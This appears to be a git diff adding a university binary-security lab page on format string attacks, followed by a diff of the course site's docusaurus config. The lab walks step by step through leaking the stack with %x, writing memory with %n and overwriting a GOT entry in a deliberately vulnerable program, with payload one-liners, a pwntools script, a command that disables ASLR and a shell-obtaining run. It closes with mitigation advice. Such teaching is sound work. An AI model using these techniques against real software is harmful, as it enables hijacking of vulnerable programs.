+ +When sending your exploit to the remote server, adjust this address according to the binary running on the remote endpoint. +The precompiled binary can be found in [the CNS public repository](/courses/cns/resources/repo "cns:resources:repo"). + +After you write 0x300 chars in v, you should obtain shell + +```console +$ python exploit64.py +[!] Could not find executable 'basic_format_string' in $PATH, using './basic_format_string' instead +[+] Starting local process './basic_format_string': pid 20785 +[*] Switching to interactive mode + 7fffffffdcc0 7fffffffdcc01f60229b7ffff7dd18d03125786c6c393425786c6c25786c6c34786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25a6e25 +$ +``` + +## Extra: Format String Attack + +Go to the `04-format-string/` subfolder. +In this task you will be working with a **32-bit binary**. + +The goal of this task is to call `my_evil_func` again. +This task is also tutorial based. + +```c +int main(int argc, char *argv[]) +{ + printf(argv[1]); + printf("\nThis is the most useless and insecure program!\n"); + return 0; +} +``` + +### Transform Format String Attack to a Memory Write + +Any string that represents a useful format (e.g. `%d`, `%x` etc.) can be used to discover the vulnerability. + +```console +$ ./format "%08x %08x %08x %08x" +00000000 f759d4d3 00000002 ffd59bd4 +This is the most useless and insecure program! +``` + +The values starting with 0xf are very likely pointers. +Again, we can use this vulnerability as a information leakage. +But we want more. + +Another useful format for us is `%m$` followed by any normal format selector. +Which means that the `m`th parameter is used as an input for the following format. +`%10$08x` will print the `10`th parameter with `%08x`. +This allows us to do a precise access of the stack. 
+ +Example: + +```console +$ ./format "%08x %08x %08x %08x %1\$08x %2\$08x %3\$08x %4\$08x" +00000000 f760d4d3 00000002 ff9aca24 00000000 f760d4d3 00000002 ff9aca24 +This is the most useless and insecure program! +``` + +Note the equivalence between formats. +Now, because we are able to select *any* higher address with this function and because the buffer is on the stack, sooner or later we will discover our own buffer. + +```console +./format "$(python -c 'print("%08x\n" * 10000)')" +``` + +Depending on your setup you should be able to view the hex +representation of the string "%08x\\n". + +**Why do we need our own buffer?** +Remember the `%n` format? +It can be used to write at an address given as parameter. +The idea is to give this address as parameter and achieve memory writing. +We will see later how to control the value. + +The next steps are done with ASLR disabled. +In order to disable ASLR, please run: + +```console +echo 0 | sudo tee /proc/sys/kernel/randomize_va_space +``` + +By trial and error or by using GDB (breakpoint on `printf`) we can determine where the buffer starts: + +```console +$ ./format "$(python -c 'import sys; sys.stdout.buffer.write(b"ABCD" + b"%08x\n " * 0x300)')" | grep -n 41 | head +10: ffffc410 +52: ffffcc41 +72: ffffcf41 +175: 44434241 +``` + +Command line Python exploits tend to get very tedious and hard to read when the payload gets more complex. +You can use the following reference pwntools script to write your exploit. +The code is equivalent to the above one-liner. + +```python +#!/usr/bin/env python3 +  +from pwn import * +  +stack_items = 200 +  +pad = b"ABCD" +val_fmt = b"%08x\n " +# add a \n at the end for consistency with the command line run +fmt = pad + val_fmt * stack_items + b"\n" +  +io = process(["./format", fmt]) +  +io.interactive() +``` + +Then call the `format` using: + +```console +python exploit.py +``` + +One idea is to keep things in multiple of 4, like "%08x \\n". 
+If you are looking at line `175` we have `44434241` which is the base 16 representation of `"ABCD"` (because it's little endian). +Note, you can add as many format strings as you want; the start of the buffer will be the same (more or less). + +We can compress our buffer by specifying the position of the argument. + +```console +$ ./format $(python -c 'import sys; sys.stdout.buffer.write(b"ABCD" + b"AAAAAAAA" * 199 + b"%175$08x")') +ABCDAAAAAAAA...AAAAAAAAAAAAAAAAAAAAAAAAAAAA44434241 +This is the most useless and insecure program! +``` + +`b"AAAAAAAA" * 199` is added to maintain the length of the original string, otherwise the offset might change. + +You can see that the last information is our `b"ABCD"` string printed with `%08x`; this means that we know where our buffer is. + +You need to enable core dumps in order to reproduce the steps below: + +```console +ulimit -c unlimited +``` + +The steps below work on a given version of libc and a given system. +That is why the instruction that causes the fault is + +```asm +mov %edx,(%eax) +``` + +or the equivalent in Intel syntax + +```asm +mov DWORD PTR [eax], edx +``` + +It may be different on your system, for example `edx` may be replaced by `esi`, such as + +```asm +mov DWORD PTR [eax], esi +``` + +Update the explanations below accordingly. + +Remove any core files you may have generated before testing your program: + +```console +rm -f core +``` + +We can replace `%08x` with `%n`; this should lead to a segmentation fault. + +```console +$ ./format "$(python -c 'import sys; sys.stdout.buffer.write(b"ABCD" + b"AAAAAAAA" * 199 + b"%175$08n")')" +Segmentation fault (core dumped) + +$ gdb ./format -c core +... +Core was generated by `./format BCDEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'. +Program terminated with signal 11, Segmentation fault.
+#0 0xf7e580a2 in vfprintf () from /lib/i386-linux-gnu/libc.so.6 +(gdb) bt +#0 0xf7e580a2 in vfprintf () from /lib/i386-linux-gnu/libc.so.6 +#1 0xf7e5deff in printf () from /lib/i386-linux-gnu/libc.so.6 +#2 0x08048468 in main (argc=2, argv=0xffffd2f4) at format.c:18 +(gdb) x/i $eip +=> 0xf7e580a2 : mov %edx,(%eax) +(gdb) info registers $edx $eax +edx 0x202 1596 +eax 0x44434241 1145258561 +(gdb) quit +``` + +Bingo. +We have memory write. +The vulnerable code tried to write at the address `0x44434241` ("ABCD" little endian) the value 1596. +The value 1596 is the amount of data written so far by `printf` (`"ABCD" + 199 * "AAAAAAAA"`). + +Right now, our input string has 1604 bytes (1605 with a `\n` at the end). +But we can further compress it, thus making the value that we write independent of the length of the input. + +```console +$ ./format "$(python -c 'import sys; sys.stdout.buffer.write(b"ABCD" + b"A" * 1588 + b"%99x" + b"%126$08n")')" +Segmentation fault (core dumped) + +$ gdb ./format -c core +(gdb) info registers $edx $eax +edx 0x261 1691 +eax 0x44434241 1145258561 +(gdb) quit +``` + +Here we managed to write `1691` (`4+1588+99`). +Note that we should keep the number of bytes before the format string the same. +This means that if we want to print with a padding of 100 (three digits) we should remove one `A`. +You can try this by yourself. + +**How far can we go?** +Probably we can use any integer for specifying the number of bytes which are used for a format, but we don't need this; +moreover, specifying a very large padding is not always feasible; think what happens when printing with `snprintf`. +`255` should be enough. + +Remember, we want to write a value to a certain address. +So far we control the address, but the value is somewhat limited. +If we want to write 4 bytes at a time we can make use of the endianness of the machine. +**The idea** is to write at the address n and then at the address n+1 and so on. + +Let's first display the address.
+We are using the address `0x804c014`. +This address is the address of the GOT entry for the `puts` function. +Basically, we will overwrite the GOT entry for `puts`. + +Check the `exploit.py` script from the task directory, read the comments and understand what it does. + +```console +$ python exploit.py +[*] 'format' + Arch: i386-32-little + RELRO: Partial RELRO + Stack: No canary found + NX: NX enabled + PIE: No PIE (0x8048000) +[+] Starting local process './format': pid 29030 +[*] Switching to interactive mode +[*] Process './format' stopped with exit code 0 (pid 29030) +\x14\x04\x15\x04\x17\x04\x18\x04 804c014 804c015 804c017 804c018 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA... +This is the most useless and insecure program! +``` + +The output starts with `\x14\x04\x15\x04\x17\x04\x18\x04 804c014 804c015 804c017 804c018` which are the 4 addresses we have written (raw, little endian) followed by the numerical prints done with `%x` of the same addresses. + +If you have the same output it means that now, if you replace `%x` with `%n` (change `fmt = write_fmt` in the script) it will try to write something at those valid addresses. + +We want to put the value `0x080491a6`. + +```console +$ objdump -d ./format | grep my_evil +080491a6 : +``` + +As `%n` writes how many characters have been printed until it is reached, each `%n` will write an incrementally larger value. +We use the 4 adjacent addresses to write byte by byte and use overflows to reach a lower value for the next byte. +For example, after writing `0xa6` we can write `0x0191`: + +![Write Bytes](https://ocw.cs.pub.ro/courses/_media/cns/labs/bytes_write.png) + +Also, the `%n` count doesn't reset so, if we want to write `0xa6` and then `0x91` the payload should be in the form of `<0xa6 bytes>%n<0x100 - 0xa6 + 0x91 bytes>%n`. + +As mentioned above, instead of writing N bytes (`"A" * N`) you can use other format strings like `%Nc` or `%Nx` to keep the payload shorter. + +**Bonus task** Can you get a shell? 
+(Assume ASLR is disabled). + +### Mitigation and Recommendations + +1. Manage the string length carefully. +1. Don't use `gets`. + With `gets` there is no way of limiting how much data is read into the buffer. +1. Use string functions with an `n` parameter whenever a non-constant string is involved, e.g. `snprintf`, `strncat`. +1. Make sure that the `NUL` byte is added, for instance `strncpy` does **not** add a `NUL` byte when the source string does not fit in the destination. +1. Use `wcs*` functions when dealing with wide char strings. +1. Don't trust the user! + +### Real life Examples + +- [Heartbleed](http://xkcd.com/1354/) + Linux kernel through 3.9.4 [CVE-2013-2851](http://www.cvedetails.com/cve/CVE-2013-2851/) + The fix is [here](https://lore.kernel.org/all/1370649055-12830-2-git-send-email-keescook@chromium.org/). + More details [here](http://www.intelligentexploit.com/view-details-ascii.html?id=16609). + +- Windows 7 [CVE-2012-1851](http://www.cvedetails.com/cve/CVE-2012-1851/) + +- Pidgin Off-the-Record plugin [CVE-2012-2369](http://www.cvedetails.com/cve/CVE-2012-2369). + The fix is [here](https://bugzilla.novell.com/show_bug.cgi?id=762498#c1). + +## Resources + +- [Secure Coding in C and C++](http://www.cert.org/books/secure-coding/) +- [String representation in C](http://www.informit.com/articles/article.aspx?p=2036582) +- [Improper string length checking](https://www.owasp.org/index.php/Improper_string_length_checking) +- [Format String definition](http://cwe.mitre.org/data/definitions/134.html) +- [Format String Attack (OWASP)](https://www.owasp.org/index.php/Format_string_attack) +- [Format String Attack (webappsec)](http://projects.webappsec.org/w/page/13246926/Format%20String) +- [strlcpy and strlcat - consistent, safe, string copy and concatenation.](http://www.gratisoft.us/todd/papers/strlcpy.html): This resource is useful to understand some of the string manipulation problems. 
diff --git a/config.yaml b/config.yaml index ee5d903..67e49de 100644 --- a/config.yaml +++ b/config.yaml @@ -1,3 +1,4 @@ +--- stages: - make_assets - embed_reveal @@ -25,8 +26,8 @@ embed_reveal: target: docusaurus extension: mdx build: - Exploration-tools: Exploration-tools - Executables-and-processes: Executable-and-processes + Exploration-Tools: Exploration-Tools + Executables-and-Processes: Executables-and-Processes Static-Analysis: Static-Analysis Dynamic-Analysis: Dynamic-Analysis @@ -38,39 +39,106 @@ docusaurus: structure: - Introduction: chapters/README.md - Binary Analysis: - - Overview: chapters/binary-analysis/overview/README.md + - Exploration Tools: + path: chapters/binary-analysis/exploration-tools + extra: + - media/ + subsections: + - Reading/: reading/ + - Slides: /build/embed_reveal/Exploration-Tools + - Executables and Processes: + path: chapters/binary-analysis/executables-and-processes + extra: + - media/ + subsections: + - Reading/: reading/ + - Drills: + path: drills + subsections: + - Matryoshka/: 06-challenge-matryoshka/ + - Slides: /build/embed_reveal/Executables-and-Processes - Static Analysis: - path: chapters/binary-analysis/static-analysis/ + path: chapters/binary-analysis/static-analysis extra: - media/ subsections: - Reading/: reading/ - Drills: - path: drills/ + path: drills subsections: - Crypto Crackme/: 04-challenge-crypto-crackme/ - Broken/: 05-challenge-broken/ - Hyp3rs3rv3r/: 06-challenge-hyp3rs3rv3r/ - Demos: - path: demos/ + path: demos subsections: - Disassemble Methods/: 01-tutorial-disassemble-methods/ - - IDA time/: 02-tutorial-ida-time/ + - IDA Time/: 02-tutorial-ida-time/ - CPP Executables/: 03-tutorial-cpp-executables/ - - Slides: /build/embed_reveal/Static-Analysis - - - Exploitation Techniques: chapters/README.md - - Mitigations and Defensive Strategies: chapters/README.md - + - Dynamic Analysis: + path: chapters/binary-analysis/dynamic-analysis + subsections: + - Reading/: reading/ + - Slides: 
/build/embed_reveal/Dynamic-Analysis + - Exploitation Techniques: + - Buffer Exploitation: + extra: + - media/ + path: chapters/exploitation-techniques/buffer-exploitation + subsections: + - Reading/: reading/ + - Shellcodes: + extra: + - media/ + path: chapters/exploitation-techniques/shellcodes + subsections: + - Reading/: reading/ + - Shellcodes Advanced: + path: chapters/exploitation-techniques/shellcodes-advanced + subsections: + - Reading/: reading/ + - Return-Oriented Programming: + extra: + - media/ + path: chapters/exploitation-techniques/return-oriented-programming + subsections: + - Reading/: reading/ + - Return-Oriented Programming Advanced: + path: chapters/exploitation-techniques/return-oriented-programming-advanced + subsections: + - Reading/: reading/ + - Mitigations and Defensive Strategies: + - Defense Mechanisms: + path: chapters/mitigations-and-defensive-strategies/defense-mechanisms + subsections: + - Reading/: reading/ + - Information Leaks: + path: chapters/mitigations-and-defensive-strategies/information-leaks + subsections: + - Reading/: reading/ + - Bypassing Mitigations: + path: chapters/mitigations-and-defensive-strategies/bypassing-mitigations + subsections: + - Drills: + path: drills + subsections: + - Tutorial Bypass/: 03-tutorial-bypass-dep-no-aslr-libc/ + - Challenge Bypass No ASLR/: 08-challenge-bypass-dep-no-aslr-libc/ + - Challenge Bypass ASLR/: 09-challenge-bypass-dep-aslr-libc/ + - Extra: + - Pwntools Intro: + path: chapters/extra/pwntools-intro + subsections: + - Reading/: reading/ static_assets: - - Exploration-tools: /build/make_assets/chapters/binary-analysis/exploration-tools/slides/_site - - Executables-and-processes: /build/make_assets/chapters/binary-analysis/executables-and-processes/slides/_site + - Exploration-Tools: /build/make_assets/chapters/binary-analysis/exploration-tools/slides/_site + - Executables-and-Processes: /build/make_assets/chapters/binary-analysis/executables-and-processes/slides/_site - 
Static-Analysis: /build/make_assets/chapters/binary-analysis/static-analysis/slides/_site - Dynamic-Analysis: /build/make_assets/chapters/binary-analysis/dynamic-analysis/slides/_site config_meta: title: Binary Security - url: http://open-education-hub.github.io/binary-security/ + url: http://open-education-hub.github.io baseUrl: /binary-security/ onBrokenLinks: warn onBrokenMarkdownLinks: warn